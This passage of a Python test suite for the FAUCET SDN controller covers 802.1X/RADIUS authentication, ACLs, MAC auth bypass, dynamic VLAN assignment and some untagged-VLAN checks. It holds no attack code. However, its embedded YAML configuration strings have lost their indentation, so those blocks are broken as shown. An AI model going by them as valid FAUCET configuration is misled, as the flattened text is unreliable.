            with open('%s/freeradius/sites-enabled/default' % self.tmpdir, 'r+', encoding='utf-8') as default_site:
                default_config = default_site.read()
                default_config = re.sub(
                    listen_match, '', default_config)
                default_config = re.sub(
                    r'server default {', 'server default {\n' + listen_config, default_config)
                default_site.seek(0)
                default_site.write(default_config)
                default_site.truncate()
        with open(users_path, 'w', encoding='utf-8') as users_file:
            users_file.write(self.freeradius_user_conf.format(self.SESSION_TIMEOUT))
        with open('%s/freeradius/clients.conf' % self.tmpdir, 'w', encoding='utf-8') as clients:
            clients.write("""client localhost {
    ipaddr = 127.0.0.1
    secret = SECRET
}""")
        with open('%s/freeradius/sites-enabled/inner-tunnel' % self.tmpdir, 'r+', encoding='utf-8') as innertunnel_site:
            tunnel_config = innertunnel_site.read()
            listen_config = """listen {
    ipaddr = 127.0.0.1
    port = %d
    type = auth
}""" % (self.RADIUS_PORT + 2)
            tunnel_config = re.sub(listen_match, listen_config, tunnel_config)
            innertunnel_site.seek(0)
            innertunnel_site.write(tunnel_config)
            innertunnel_site.truncate()
        os.system('chmod o+rx %s' % self.root_tmpdir)
        os.system('chown -R root:freerad %s/freeradius/' % self.tmpdir)
        self.nfv_host.cmd(
            mininet_test_util.timeout_cmd(
                'freeradius -X -l %s -d %s/freeradius &' % (radius_log_path, self.tmpdir),
                300))
        self.wait_for_radius(radius_log_path)
        return radius_log_path
class Faucet8021XSuccessTest(Faucet8021XBase):
    """Both supplicant hosts authenticate; the second one also logs off."""

    DOT1X_EXPECTED_EVENTS = [
        {'ENABLED': {}},
        {'PORT_UP': {'port': 'port_1', 'port_type': 'supplicant'}},
        {'PORT_UP': {'port': 'port_2', 'port_type': 'supplicant'}},
        {'PORT_UP': {'port': 'port_4', 'port_type': 'nfv'}},
        {'AUTHENTICATION': {'port': 'port_1', 'eth_src': 'HOST1_MAC', 'status': 'success'}},
        {'AUTHENTICATION': {'port': 'port_2', 'eth_src': 'HOST2_MAC', 'status': 'success'}},
        {'AUTHENTICATION': {'port': 'port_2', 'eth_src': 'HOST2_MAC', 'status': 'logoff'}}]
    SESSION_TIMEOUT = 3600

    def test_untagged(self):
        self.verify_host_success(
            self.eapol1_host, self.port_map['port_1'], self.wpasupplicant_conf_1, False)
        # NOTE(review): the second host also uses wpasupplicant_conf_1 (not
        # conf_2) — confirm this is intentional.
        self.verify_host_success(
            self.eapol2_host, self.port_map['port_2'], self.wpasupplicant_conf_1, True)
        self.post_test_checks()
class Faucet8021XFailureTest(Faucet8021XBase):
    """Failure due to incorrect identity/password"""

    # Overrides the base config with a deliberately wrong password.
    wpasupplicant_conf_1 = """
ap_scan=0
network={
    key_mgmt=IEEE8021X
    eap=MD5
    identity="user"
    password="wrongpassword"
}
"""

    DOT1X_EXPECTED_EVENTS = [
        {'ENABLED': {}},
        {'PORT_UP': {'port': 'port_1', 'port_type': 'supplicant'}},
        {'PORT_UP': {'port': 'port_2', 'port_type': 'supplicant'}},
        {'PORT_UP': {'port': 'port_4', 'port_type': 'nfv'}},
        {'AUTHENTICATION': {'port': 'port_1', 'eth_src': 'HOST1_MAC', 'status': 'failure'}}]

    def test_untagged(self):
        # Authentication must fail (EAP Failure observed, counters bump).
        self.assertFalse(
            self.try_8021x(
                self.eapol1_host, self.port_map['port_1'],
                self.wpasupplicant_conf_1, and_logoff=False,
                expect_success=False))
        self.post_test_checks()
class Faucet8021XPortStatusTest(Faucet8021XBase):
    """Verify 802.1X flows track supplicant/NFV port up and down events."""

    DOT1X_EXPECTED_EVENTS = [
        {'ENABLED': {}},
        {'PORT_UP': {'port': 'port_1', 'port_type': 'supplicant'}},
        {'PORT_UP': {'port': 'port_2', 'port_type': 'supplicant'}},
        {'PORT_UP': {'port': 'port_4', 'port_type': 'nfv'}},
        {'PORT_DOWN': {'port': 'port_1', 'port_type': 'supplicant'}},
        {'PORT_UP': {'port': 'port_1', 'port_type': 'supplicant'}},
        {'PORT_UP': {'port': 'port_4', 'port_type': 'nfv'}},
        {'PORT_DOWN': {'port': 'port_1', 'port_type': 'supplicant'}},
        {'PORT_UP': {'port': 'port_4', 'port_type': 'nfv'}},
        {'PORT_UP': {'port': 'port_1', 'port_type': 'supplicant'}},
        {'AUTHENTICATION': {'port': 'port_1', 'eth_src': 'HOST1_MAC', 'status': 'success'}},
        {'PORT_DOWN': {'port': 'port_1', 'port_type': 'supplicant'}},
        {'PORT_UP': {'port': 'port_1', 'port_type': 'supplicant'}}]

    def test_untagged(self):
        port_no1 = self.port_map['port_1']
        port_no2 = self.port_map['port_2']
        port_no4 = self.port_map['port_4']
        self.wait_8021x_flows(port_no1)
        self.set_port_down(port_no1)
        # self.wait_until_no_matching_flow(None, table_id=0, actions=actions)
        self.set_port_up(port_no1)
        self.wait_8021x_flows(port_no1)
        self.set_port_down(port_no4)
        # self.wait_until_no_matching_flow(match, table_id=0, actions=actions)
        self.set_port_up(port_no4)
        self.wait_8021x_flows(port_no1)
        # check only have rules for port 2 installed, after the NFV port comes up
        self.set_port_down(port_no1)
        self.flap_port(port_no4)
        self.wait_8021x_flows(port_no2)
        # no portno1
        self.set_port_up(port_no1)
        self.wait_8021x_flows(port_no1)
        # When the port goes down, and up the host should not be authenticated anymore.
        self.assertTrue(self.retry_8021x(
            self.eapol1_host, port_no1, self.wpasupplicant_conf_1, and_logoff=False))
        self.one_ipv4_ping(self.eapol1_host, self.ping_host.IP(), require_host_learned=False)
        # terminate so don't automatically reauthenticate when port goes back up.
        self.terminate_wpasupplicant(self.eapol1_host)
        self.flap_port(port_no1)
        self.wait_8021x_flows(port_no1)
        self.one_ipv4_ping(
            self.eapol1_host, self.ping_host.IP(),
            require_host_learned=False, expected_result=False)
        self.post_test_checks()
class Faucet8021XPortFlapTest(Faucet8021XBase):
    """Authentication must not survive a supplicant port going down."""

    def test_untagged(self):
        port_no1 = self.port_map['port_1']
        # Two full up/auth/down/deauth cycles.
        for _ in range(2):
            self.set_port_up(port_no1)
            self.assertTrue(self.retry_8021x(
                self.eapol1_host, port_no1, self.wpasupplicant_conf_1, and_logoff=True))
            self.set_port_down(port_no1)
            self.assertFalse(self.try_8021x(
                self.eapol1_host, port_no1, self.wpasupplicant_conf_1, and_logoff=False, expect_success=False))
            self.one_ipv4_ping(
                self.eapol1_host, self.ping_host.IP(),
                require_host_learned=False, expected_result=False)
            wpa_status = self.get_wpa_status(
                self.eapol1_host, self.get_wpa_ctrl_path(self.eapol1_host))
            self.assertNotEqual('SUCCESS', wpa_status)
            # Kill supplicant so cant reply to the port up identity request.
            self.terminate_wpasupplicant(self.eapol1_host)
        self.post_test_checks()
class Faucet8021XIdentityOnPortUpTest(Faucet8021XBase):
    """An identity request must be sent when a supplicant port comes up,
    and the running supplicant must re-authenticate from it."""

    def test_untagged(self):
        port_no1 = self.port_map['port_1']
        # start wpa sup, logon, then send id request.
        self.set_port_up(port_no1)
        self.assertTrue(self.try_8021x(
            self.eapol1_host, port_no1, self.wpasupplicant_conf_1, and_logoff=False))
        self.set_port_down(port_no1)
        self.one_ipv4_ping(
            self.eapol1_host, self.ping_host.IP(),
            require_host_learned=False, expected_result=False)

        def port_up(port):
            self.set_port_up(port)
            self.wait_8021x_flows(port)

        username = 'user'
        # Hex-encode the username so tcpdump can match it inside the
        # EAP Identity response payload.
        username_bytes = ''.join(('%2x' % ord(c) for c in username))
        tcpdump_filter = ' or '.join((
            self._success_eapol_filter(True),
            self._eapol_filter(('ether[23:4] == 0x%s' % username_bytes,))))
        tcpdump_txt = self.tcpdump_helper(
            self.eapol1_host, tcpdump_filter, [
                lambda: port_up(port_no1)],
            timeout=30, vflags='-vvv', packets=2)
        for req_str in (
                'Identity: %s' % username,  # supplicant replies with username
                'Success',  # supplicant success
        ):
            self.assertTrue(req_str in tcpdump_txt, msg='%s not in %s' % (req_str, tcpdump_txt))
        self.one_ipv4_ping(
            self.eapol1_host, self.ping_host.IP(),
            require_host_learned=False, expected_result=True, retries=10)
        self.post_test_checks()
class Faucet8021XPeriodicReauthTest(Faucet8021XBase):
    """Verify the port is periodically re-authenticated (success counter
    keeps increasing without further client action)."""

    # Session timeout in seconds; re-auth is expected within this period.
    # NOTE(review): presumably consumed by the RADIUS/base-class setup — confirm.
    SESSION_TIMEOUT = 15

    def test_untagged(self):
        port_no1 = self.port_map['port_1']
        port_labels1 = self.port_labels(port_no1)
        self.set_port_up(port_no1)
        self.assertTrue(self.try_8021x(
            self.eapol1_host, port_no1, self.wpasupplicant_conf_1, and_logoff=False))
        last_total = self.scrape_prometheus_var(
            'port_dot1x_success_total', labels=port_labels1, default=0)
        # Expect four consecutive re-auths, each observed as an increase in
        # the Prometheus success counter.
        for _ in range(4):
            # Poll for up to twice the session timeout for the next re-auth.
            for _ in range(self.SESSION_TIMEOUT * 2):
                total = self.scrape_prometheus_var(
                    'port_dot1x_success_total', labels=port_labels1, default=0)
                if total > last_total:
                    break
                time.sleep(1)
            self.assertGreater(total, last_total, msg='failed to successfully re-auth')
            last_total = total
        self.post_test_checks()
class Faucet8021XConfigReloadTest(Faucet8021XBase):
    """Verify that disabling dot1x on one port via config reload leaves the
    other port's 802.1X flows in place."""

    def test_untagged(self):
        dot1x_port = self.port_map['port_1']
        other_port = self.port_map['port_2']
        # Both ports start with 802.1X flows installed.
        for port in (dot1x_port, other_port):
            self.wait_8021x_flows(port)
        # Turn dot1x off on the first port only and push the new config.
        faucet_conf = self._get_faucet_conf()
        faucet_conf['dps'][self.DP_NAME]['interfaces'][dot1x_port]['dot1x'] = False
        self.reload_conf(
            faucet_conf, self.faucet_config_path,
            restart=True, cold_start=False, change_expected=True)
        # The untouched port must still have its 802.1X flows.
        self.wait_8021x_flows(other_port)
        self.post_test_checks()
class Faucet8021XCustomACLLoginTest(Faucet8021XBase):
    """Ensure that 8021X Port ACLs Work before and after Login"""

    # auth_acl (applied once authenticated) permits ICMP and ARP;
    # noauth_acl (applied while unauthenticated) blocks ICMP but allows ARP.
    CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
auth_acl:
- rule:
dl_type: 0x800 # Allow ICMP / IPv4
ip_proto: 1
actions:
allow: True
- rule:
dl_type: 0x0806 # ARP Packets
actions:
allow: True
noauth_acl:
- rule:
dl_type: 0x800 # Deny ICMP / IPv4
ip_proto: 1
actions:
allow: False
- rule:
dl_type: 0x0806 # ARP Packets
actions:
allow: True
"""

    # Ports 1/2 are dot1x supplicants with dot1x_acl enabled; port 3 is the
    # ping target; port 4 is the NFV/controller interface.
    CONFIG = """
dot1x:
nfv_intf: NFV_INTF
nfv_sw_port: %(port_4)d
radius_ip: 127.0.0.1
radius_port: RADIUS_PORT
radius_secret: SECRET
auth_acl: auth_acl
noauth_acl: noauth_acl
interfaces:
%(port_1)d:
name: b1
description: "b1"
native_vlan: 100
# 802.1x client.
dot1x: True
dot1x_acl: True
%(port_2)d:
name: b2
description: "b2"
native_vlan: 100
# 802.1X client.
dot1x: True
dot1x_acl: True
%(port_3)d:
name: b3
description: "b3"
native_vlan: 100
# ping host.
%(port_4)d:
name: b4
description: "b4"
output_only: True
# "NFV host - interface used by controller."
"""

    def test_untagged(self):
        """Authenticate host 1 and verify connectivity (no logoff)."""
        self.verify_host_success(
            self.eapol1_host, self.port_map['port_1'], self.wpasupplicant_conf_1, False)
        self.post_test_checks()
class Faucet8021XCustomACLLogoutTest(Faucet8021XCustomACLLoginTest):
    """Ensure that 8021X Port ACLs Work before and after Logout"""

    def test_untagged(self):
        supplicant = self.eapol1_host
        # Unauthenticated: the noauth ACL must block ICMP.
        self.one_ipv4_ping(supplicant, self.ping_host.IP(),
                           require_host_learned=False, expected_result=False)
        # Authenticate and immediately log off again.
        self.assertTrue(self.try_8021x(
            supplicant, self.port_map['port_1'], self.wpasupplicant_conf_1, and_logoff=True))
        # After logoff the noauth ACL applies once more: ICMP blocked.
        self.one_ipv4_ping(supplicant, self.ping_host.IP(),
                           require_host_learned=False, expected_result=False)
        self.post_test_checks()
class Faucet8021XMABTest(Faucet8021XSuccessTest):
    """Ensure that 802.1x Port Supports Mac Auth Bypass."""

    DOT1X_EXPECTED_EVENTS = [{'ENABLED': {}},
                             {'PORT_UP': {'port': 'port_1', 'port_type': 'supplicant'}},
                             {'PORT_UP': {'port': 'port_2', 'port_type': 'supplicant'}},
                             {'PORT_UP': {'port': 'port_4', 'port_type': 'nfv'}},
                             {'AUTHENTICATION': {'port': 'port_1', 'eth_src': 'HOST1_MAC',
                                                 'status': 'success'}},
                             ]

    # port_1 has dot1x_mab enabled (MAC auth bypass); port_2 is a plain
    # dot1x supplicant; port_3 is the ping target; port_4 is the NFV port.
    CONFIG = """
dot1x:
nfv_intf: NFV_INTF
nfv_sw_port: %(port_4)d
radius_ip: 127.0.0.1
radius_port: RADIUS_PORT
radius_secret: SECRET
interfaces:
%(port_1)d:
native_vlan: 100
# 802.1x client.
dot1x: True
dot1x_mab: True
%(port_2)d:
native_vlan: 100
# 802.1X client.
dot1x: True
%(port_3)d:
native_vlan: 100
# ping host.
%(port_4)d:
output_only: True
# "NFV host - interface used by controller."
"""

    def start_freeradius(self):
        """Register host 1's MAC as a FreeRADIUS user, then start the server.

        For MAB the username and password are both the host MAC address
        with the colons stripped.
        """
        # Add the host mac address to the FreeRADIUS config
        self.freeradius_user_conf += '\n{0} Cleartext-Password := "{0}"'.format(
            str(self.eapol1_host.MAC()).replace(':', '')
        )
        return super().start_freeradius()

    def test_untagged(self):
        """Non-EAPOL traffic (DHCP) must trigger MAB and grant access."""
        port_no1 = self.port_map['port_1']
        # No connectivity before any authentication.
        self.one_ipv4_ping(
            self.eapol1_host, self.ping_host.IP(),
            require_host_learned=False, expected_result=False)
        # DHCP attempt from the host triggers MAC auth bypass.
        self.eapol1_host.run_dhclient(self.tmpdir)
        self.wait_until_matching_lines_from_faucet_log_files(r'.*AAA_SUCCESS.*')
        self.one_ipv4_ping(
            self.eapol1_host, self.ping_host.IP(),
            require_host_learned=False, expected_result=True)
        self.assertEqual(
            1,
            self.scrape_prometheus_var('port_dot1x_success_total', labels=self.port_labels(port_no1), default=0))
        self.post_test_checks()
class Faucet8021XDynACLLoginTest(Faucet8021XCustomACLLoginTest):
    """Ensure RADIUS-assigned (dynamic) 8021X port ACLs are applied on login."""

    DOT1X_EXPECTED_EVENTS = [
        {'ENABLED': {}},
        {'PORT_UP': {'port': 'port_1', 'port_type': 'supplicant'}},
        {'PORT_UP': {'port': 'port_2', 'port_type': 'supplicant'}},
        {'PORT_UP': {'port': 'port_4', 'port_type': 'nfv'}},
        {'AUTHENTICATION': {'port': 'port_1', 'eth_src': 'HOST1_MAC', 'status': 'success'}},
        {'AUTHENTICATION': {'port': 'port_2', 'eth_src': 'HOST2_MAC', 'status': 'success'}},
    ]

    # Identity chosen so RADIUS assigns the accept (ICMP-allowing) ACL.
    wpasupplicant_conf_1 = """
ap_scan=0
network={
key_mgmt=IEEE8021X
eap=MD5
identity="filter_id_user_accept"
password="accept_pass"
}
"""

    # Identity chosen so RADIUS assigns the deny (ICMP-blocking) ACL.
    wpasupplicant_conf_2 = """
ap_scan=0
network={
key_mgmt=IEEE8021X
eap=MD5
identity="filter_id_user_deny"
password="deny_pass"
}
"""

    # Both ACLs are dot1x_assigned (selectable by RADIUS Filter-Id).
    CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
accept_acl:
dot1x_assigned: True
rules:
- rule:
dl_type: 0x800 # Allow ICMP / IPv4
ip_proto: 1
actions:
allow: True
- rule:
dl_type: 0x0806 # ARP Packets
actions:
allow: True
deny_acl:
dot1x_assigned: True
rules:
- rule:
dl_type: 0x800 # Deny ICMP / IPv4
ip_proto: 1
actions:
allow: False
- rule:
dl_type: 0x0806 # ARP Packets
actions:
allow: True
"""

    CONFIG = """
dot1x:
nfv_intf: NFV_INTF
nfv_sw_port: %(port_4)d
radius_ip: 127.0.0.1
radius_port: RADIUS_PORT
radius_secret: SECRET
interfaces:
%(port_1)d:
name: b1
description: "b1"
native_vlan: 100
# 802.1x client.
dot1x: True
dot1x_dyn_acl: True
%(port_2)d:
name: b2
description: "b2"
native_vlan: 100
# 802.1X client.
dot1x: True
dot1x_dyn_acl: True
%(port_3)d:
name: b3
description: "b3"
native_vlan: 100
# ping host.
%(port_4)d:
name: b4
description: "b4"
output_only: True
# "NFV host - interface used by controller."
"""

    def test_untagged(self):
        port_no1 = self.port_map['port_1']
        port_no2 = self.port_map['port_2']
        # No connectivity before either host authenticates.
        self.one_ipv4_ping(self.eapol1_host, self.ping_host.IP(),
                           require_host_learned=False, expected_result=False)
        self.one_ipv4_ping(self.eapol2_host, self.ping_host.IP(),
                           require_host_learned=False, expected_result=False)
        self.assertTrue(self.try_8021x(
            self.eapol1_host, port_no1, self.wpasupplicant_conf_1, and_logoff=False))
        self.assertTrue(self.try_8021x(
            self.eapol2_host, port_no2, self.wpasupplicant_conf_2, and_logoff=False))
        # Host 1 ("accept" identity) can ping; host 2 ("deny" identity) cannot.
        self.one_ipv4_ping(self.eapol1_host, self.ping_host.IP(),
                           require_host_learned=False, expected_result=True)
        self.one_ipv4_ping(self.eapol2_host, self.ping_host.IP(),
                           require_host_learned=False, expected_result=False)
        self.post_test_checks()
class Faucet8021XDynACLLogoutTest(Faucet8021XDynACLLoginTest):
    """Verify the dynamically assigned ACL no longer grants access after
    the supplicant logs off."""

    DOT1X_EXPECTED_EVENTS = [
        {'ENABLED': {}},
        {'PORT_UP': {'port': 'port_1', 'port_type': 'supplicant'}},
        {'PORT_UP': {'port': 'port_4', 'port_type': 'nfv'}},
        {'AUTHENTICATION': {'port': 'port_1', 'eth_src': 'HOST1_MAC', 'status': 'success'}},
        {'AUTHENTICATION': {'port': 'port_1', 'eth_src': 'HOST1_MAC', 'status': 'logoff'}}
    ]

    def test_untagged(self):
        supplicant = self.eapol1_host
        supplicant_port = self.port_map['port_1']
        # Unauthenticated: no connectivity.
        self.one_ipv4_ping(supplicant, self.ping_host.IP(),
                           require_host_learned=False, expected_result=False)
        # Authenticate with the "accept" identity, then log off again.
        self.assertTrue(self.try_8021x(
            supplicant, supplicant_port, self.wpasupplicant_conf_1, and_logoff=True))
        # Logoff must revoke the dynamic ACL: pings fail once more.
        self.one_ipv4_ping(supplicant, self.ping_host.IP(),
                           require_host_learned=False, expected_result=False)
        self.post_test_checks()
class Faucet8021XVLANTest(Faucet8021XSuccessTest):
    """Test that two hosts are put into vlans.

    Same VLAN, Logoff, diff VLANs, port flap.
    """

    # Static VLAN 100 plus two RADIUS-assignable (dot1x_assigned) VLANs.
    CONFIG_GLOBAL = """vlans:
100:
vid: 100
description: "untagged"
radiusassignedvlan1:
vid: %u
description: "untagged"
dot1x_assigned: True
radiusassignedvlan2:
vid: %u
description: "untagged"
dot1x_assigned: True
""" % (mininet_test_base.MAX_TEST_VID - 1,
       mininet_test_base.MAX_TEST_VID)

    CONFIG = """
dot1x:
nfv_intf: NFV_INTF
nfv_sw_port: %(port_4)d
radius_ip: 127.0.0.1
radius_port: RADIUS_PORT
radius_secret: SECRET
interfaces:
%(port_1)d:
native_vlan: 100
# 802.1x client.
dot1x: True
%(port_2)d:
native_vlan: 100
# 802.1X client.
dot1x: True
%(port_3)d:
native_vlan: radiusassignedvlan1
# ping host.
%(port_4)d:
output_only: True
# "NFV host - interface used by controller."
"""

    RADIUS_PORT = 1940
    DOT1X_EXPECTED_EVENTS = []

    # Identity mapped by RADIUS to radiusassignedvlan1.
    wpasupplicant_conf_1 = """
ap_scan=0
network={
key_mgmt=IEEE8021X
eap=MD5
identity="vlanuser1001"
password="password"
}
"""

    # Identity mapped by RADIUS to radiusassignedvlan2.
    wpasupplicant_conf_2 = """
ap_scan=0
network={
key_mgmt=IEEE8021X
eap=MD5
identity="vlanuser2222"
password="milliphone"
}
"""

    def test_untagged(self):
        # OpenFlow VLAN VIDs carry the OFPVID_PRESENT bit.
        vid = 100 ^ mininet_test_base.OFPVID_PRESENT
        radius_vid1 = (mininet_test_base.MAX_TEST_VID - 1) ^ mininet_test_base.OFPVID_PRESENT
        radius_vid2 = mininet_test_base.MAX_TEST_VID ^ mininet_test_base.OFPVID_PRESENT
        port_no1 = self.port_map['port_1']
        port_no2 = self.port_map['port_2']
        port_no3 = self.port_map['port_3']
        # Successful auth moves host 1 onto RADIUS-assigned VLAN 1.
        self.assertTrue(self.try_8021x(
            self.eapol1_host, port_no1, self.wpasupplicant_conf_1, and_logoff=False))
        self.wait_until_matching_flow(
            {'in_port': port_no1},
            table_id=self._VLAN_TABLE,
            actions=['SET_FIELD: {vlan_vid:%u}' % radius_vid1])
        self.wait_until_matching_flow(
            {'vlan_vid': radius_vid1},
            table_id=self._FLOOD_TABLE,
            actions=['POP_VLAN', 'OUTPUT:%s' % port_no1, 'OUTPUT:%s' % port_no3])
        self.wait_until_matching_flow(
            {'vlan_vid': vid},
            table_id=self._FLOOD_TABLE,
            actions=['POP_VLAN', 'OUTPUT:%s' % port_no2])
        self.wait_until_no_matching_flow(
            {'vlan_vid': radius_vid2},
            table_id=self._FLOOD_TABLE,
            actions=['POP_VLAN', 'OUTPUT:%s' % port_no1, 'OUTPUT:%s' % port_no2])
        self.one_ipv4_ping(
            self.eapol1_host, self.ping_host.IP(),
            require_host_learned=False, expected_result=True)
        # Logoff: host 1 loses connectivity.
        self.assertTrue(self.try_8021x(
            self.eapol1_host, port_no1, self.wpasupplicant_conf_1, and_logoff=True))
        self.one_ipv4_ping(
            self.eapol1_host, self.ping_host.IP(),
            require_host_learned=False, expected_result=False)
        # check ports are back in the right vlans.
        self.wait_until_no_matching_flow(
            {'in_port': port_no1},
            table_id=self._VLAN_TABLE,
            actions=['SET_FIELD: {vlan_vid:%u}' % radius_vid1])
        self.wait_until_matching_flow(
            {'in_port': port_no1},
            table_id=self._VLAN_TABLE,
            actions=['SET_FIELD: {vlan_vid:%u}' % vid])
        # check flood ports are in the right vlans
        self.wait_until_no_matching_flow(
            {'vlan_vid': radius_vid1},
            table_id=self._FLOOD_TABLE,
            actions=['POP_VLAN', 'OUTPUT:%s' % port_no1, 'OUTPUT:%s' % port_no3])
        self.wait_until_matching_flow(
            {'vlan_vid': vid},
            table_id=self._FLOOD_TABLE,
            actions=['POP_VLAN', 'OUTPUT:%s' % port_no1, 'OUTPUT:%s' % port_no2])
        # check two 1x hosts play nicely. (same dyn vlan)
        self.assertTrue(self.try_8021x(
            self.eapol1_host, port_no1, self.wpasupplicant_conf_1, and_logoff=False))
        self.one_ipv4_ping(
            self.eapol1_host, self.ping_host.IP(),
            require_host_learned=False, expected_result=True)
        self.one_ipv4_ping(
            self.eapol1_host, self.eapol2_host.IP(),
            require_host_learned=False, expected_result=False)
        self.assertTrue(self.try_8021x(
            self.eapol2_host, port_no2, self.wpasupplicant_conf_1, and_logoff=False))
        self.one_ipv4_ping(
            self.eapol2_host, self.ping_host.IP(),
            require_host_learned=False, expected_result=True)
        self.one_ipv4_ping(
            self.eapol2_host, self.eapol1_host.IP(),
            require_host_learned=False, expected_result=True)
        # check two 1x hosts dont play (diff dyn vlan).
        self.assertTrue(self.try_8021x(
            self.eapol2_host, port_no2, self.wpasupplicant_conf_2, and_logoff=False))
        self.one_ipv4_ping(
            self.eapol2_host, self.ping_host.IP(),
            require_host_learned=False, expected_result=False)
        self.one_ipv4_ping(
            self.eapol2_host, self.eapol1_host.IP(),
            require_host_learned=False, expected_result=False)
        # move host1 to new VLAN
        self.assertTrue(self.try_8021x(
            self.eapol1_host, port_no1, self.wpasupplicant_conf_2, and_logoff=False))
        self.one_ipv4_ping(
            self.eapol1_host, self.ping_host.IP(),
            require_host_learned=False, expected_result=False)
        self.one_ipv4_ping(
            self.eapol1_host, self.eapol2_host.IP(),
            require_host_learned=False, expected_result=True)
        # Host 1's learned entries must be on radius_vid2 only.
        # (An identical duplicate of this wait_until_matching_flow call
        # was removed here.)
        self.wait_until_matching_flow(
            {'eth_src': self.eapol1_host.MAC(), 'vlan_vid': radius_vid2},
            table_id=self._ETH_SRC_TABLE)
        self.wait_until_no_matching_flow(
            {'eth_src': self.eapol1_host.MAC(), 'vlan_vid': vid},
            table_id=self._ETH_SRC_TABLE)
        self.wait_until_no_matching_flow(
            {'eth_src': self.eapol1_host.MAC(), 'vlan_vid': radius_vid1},
            table_id=self._ETH_SRC_TABLE)
        self.wait_until_no_matching_flow(
            {'eth_dst': self.eapol1_host.MAC(), 'vlan_vid': vid},
            table_id=self._ETH_DST_TABLE)
        self.wait_until_no_matching_flow(
            {'eth_dst': self.eapol1_host.MAC(), 'vlan_vid': radius_vid1},
            table_id=self._ETH_DST_TABLE)
        # test port up/down. removes the dynamic vlan & host cache.
        self.flap_port(port_no2)
        self.wait_until_matching_flow(
            {'in_port': port_no2},
            table_id=self._VLAN_TABLE,
            actions=['SET_FIELD: {vlan_vid:%u}' % vid])
        self.wait_until_matching_flow(
            {'vlan_vid': vid},
            table_id=self._FLOOD_TABLE,
            actions=['POP_VLAN', 'OUTPUT:%s' % port_no2])
        self.wait_until_no_matching_flow(
            {'in_port': port_no2},
            table_id=self._VLAN_TABLE,
            actions=['SET_FIELD: {vlan_vid:%u}' % radius_vid2])
        self.wait_until_no_matching_flow(
            {'vlan_vid': radius_vid2},
            table_id=self._FLOOD_TABLE,
            actions=['POP_VLAN', 'OUTPUT:%s' % port_no1, 'OUTPUT:%s' % port_no2])
        self.wait_until_no_matching_flow(
            {'eth_src': self.eapol2_host.MAC()},
            table_id=self._ETH_SRC_TABLE)
        self.wait_until_no_matching_flow(
            {'eth_dst': self.eapol2_host.MAC(), 'vlan_vid': radius_vid1},
            table_id=self._ETH_DST_TABLE,
            actions=['POP_VLAN', 'OUTPUT:%s' % port_no2])
        self.post_test_checks()
class FaucetUntaggedRandomVidTest(FaucetUntaggedTest):
    """Repeatedly reconfigure the VLAN with random VIDs and verify
    connectivity after each cold start."""

    CONFIG_GLOBAL = """
vlans:
randvlan:
vid: 100
description: "untagged"
"""

    CONFIG = """
interfaces:
%(port_1)d:
native_vlan: randvlan
%(port_2)d:
native_vlan: randvlan
%(port_3)d:
native_vlan: randvlan
%(port_4)d:
native_vlan: randvlan
"""

    def test_untagged(self):
        last_vid = None
        for _ in range(5):
            vid = random.randint(2, mininet_test_base.MAX_TEST_VID)
            # Re-roll on collision with the previous VID rather than
            # silently skipping one of the 5 reconfiguration rounds
            # (the original 'continue' did the latter).
            while vid == last_vid:
                vid = random.randint(2, mininet_test_base.MAX_TEST_VID)
            self.change_vlan_config(
                'randvlan', 'vid', vid, cold_start=True, hup=True)
            self.ping_all_when_learned()
            last_vid = vid
class FaucetUntaggedNoCombinatorialFloodTest(FaucetUntaggedTest):
    """Run the untagged tests with combinatorial_port_flood disabled."""

    CONFIG = """
combinatorial_port_flood: False
""" + CONFIG_BOILER_UNTAGGED
class FaucetUntaggedControllerNfvTest(FaucetUntaggedTest):
    """Untagged test, additionally verifying the controller can observe
    traffic on the switch interface attached to the last host."""

    def test_untagged(self):
        # Name of switch interface connected to last host,
        # accessible to controller
        last_host = self.hosts_name_ordered()[-1]
        switch = self.first_switch()
        link = switch.connectionsTo(last_host)[0]
        switch_side_intf = next(
            intf for intf in link if intf in switch.intfList())
        super().test_untagged()
        # Confirm controller can see switch interface with traffic.
        ifconfig_output = self.net.controllers[0].cmd('ifconfig %s' % switch_side_intf)
        counters_seen = re.search('(R|T)X packets[: ][1-9]', ifconfig_output)
        self.assertTrue(counters_seen, msg=ifconfig_output)
class FaucetUntaggedBroadcastTest(FaucetUntaggedTest):
    """Untagged test plus broadcast/loop-safety checks."""

    def test_untagged(self):
        super().test_untagged()
        # Same checks, same order as the base sequence.
        for verify in (
                self.verify_broadcast,
                self.verify_no_bcast_to_self,
                self.verify_unicast_not_looped):
            verify()
class FaucetUntaggedNSLoopTest(FaucetUntaggedTest):
    """Verify a host does not receive its own broadcast traffic back when
    only IPv6 neighbour solicitation is permitted by ACL."""

    # ACL allows only ICMPv6 type 135 (neighbour solicitation); everything
    # else is dropped.
    CONFIG_GLOBAL = """
acls:
nsonly:
- rule:
dl_type: %u
ip_proto: 58
icmpv6_type: 135
actions:
allow: 1
- rule:
actions:
allow: 0
vlans:
100:
description: "untagged"
""" % IPV6_ETH

    CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: nsonly
%(port_2)d:
native_vlan: 100
acl_in: nsonly
%(port_3)d:
native_vlan: 100
acl_in: nsonly
%(port_4)d:
native_vlan: 100
acl_in: nsonly
"""

    def test_untagged(self):
        self.verify_no_bcast_to_self()
class FaucetUntaggedNoCombinatorialBroadcastTest(FaucetUntaggedBroadcastTest):
    """Broadcast tests with combinatorial_port_flood disabled."""

    CONFIG = """
combinatorial_port_flood: False
""" + CONFIG_BOILER_UNTAGGED
class FaucetUntaggedLogRotateTest(FaucetUntaggedTest):
    """Verify FAUCET recreates its log file after it is rotated away."""

    def test_untagged(self):
        log_path = self.env[self.faucet_controllers[0].name]['FAUCET_LOG']
        rotated_path = log_path + '.old'
        self.assertTrue(os.path.exists(log_path))
        # Simulate logrotate moving the active log aside.
        os.rename(log_path, rotated_path)
        self.assertTrue(os.path.exists(rotated_path))
        # Generate activity so FAUCET writes (and so recreates) its log.
        self.flap_all_switch_ports()
        self.assertTrue(os.path.exists(log_path))
class FaucetUntaggedLLDPTest(FaucetUntaggedTest):
    """Verify the content of FAUCET's LLDP beacon on a configured port."""

    CONFIG = """
lldp_beacon:
send_interval: 5
max_per_interval: 5
interfaces:
%(port_1)d:
native_vlan: 100
lldp_beacon:
enable: True
system_name: "faucet"
port_descr: "first_port"
org_tlvs:
- {oui: 0x12bb, subtype: 2, info: "01406500"}
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""

    @staticmethod
